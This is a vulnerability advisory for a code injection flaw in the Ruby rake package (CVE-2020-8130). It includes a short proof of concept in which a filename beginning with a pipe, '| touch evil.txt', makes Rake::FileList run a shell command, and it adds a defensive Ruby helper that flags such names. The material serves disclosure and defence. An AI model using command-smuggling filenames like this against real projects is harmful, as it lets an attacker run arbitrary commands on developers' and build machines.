Arbitrary Code Injection Affecting rake package, versions <12.3.3
Snyk CVSS
- Attack Complexity: Low
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.09% (36th percentile)
- Snyk ID SNYK-RUBY-RAKE-552000
- published 24 Feb 2020
- disclosed 24 Feb 2020
- credit Katsuhiko Yoshida
Introduced: 24 Feb 2020
CVE-2020-8130
How to fix?
Upgrade rake to version 12.3.3 or higher.
Overview
rake is a Make-like program implemented in Ruby.
Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList when supplying a filename that begins with the pipe character |.
PoC by Katsuhiko Yoshida
% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt
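A defensive check for the condition shown in the PoC, as an added Ruby example that is not code from the advisory or from the rake project. Ruby's Kernel#open treats a string beginning with | as a command to run, while File.open always treats it as a path. The helper names (rake_vulnerable?, pipe_names, safe_egrep, demo) are hypothetical, and the files are constructed in a temporary directory.

```ruby
require "tmpdir"
require "rubygems"

# Fixed version taken from the advisory's "How to fix?" section.
FIXED_RAKE = Gem::Version.new("12.3.3")

# True when the given rake version string predates the fix.
def rake_vulnerable?(version)
  Gem::Version.new(version) < FIXED_RAKE
end

# Names that Kernel#open would interpret as a command instead of a path.
def pipe_names(names)
  names.select { |n| n.start_with?("|") }
end

# Hypothetical grep helper: File.open never spawns a process, so a name
# such as "| touch evil.txt" is read as an ordinary file.
def safe_egrep(names, pattern)
  hits = []
  names.each do |fn|
    next unless File.file?(fn) # skip directories such as "vendor"
    File.open(fn, "r") do |io|
      io.each_line.with_index(1) do |line, no|
        hits << "#{fn}:#{no}:#{line.chomp}" if pattern.match?(line)
      end
    end
  end
  hits
end

# Constructed sample: mirrors the PoC directory layout in a temp dir.
def demo
  Dir.mktmpdir do |dir|
    Dir.chdir(dir) do
      File.write("notes.txt", "something here\n")
      File.write("| touch evil.txt", "something else\n")
      names = Dir.children(".").sort
      { flagged: pipe_names(names),
        hits: safe_egrep(names, /something/),
        evil_created: File.exist?("evil.txt") }
    end
  end
end

p demo if $PROGRAM_NAME == __FILE__
```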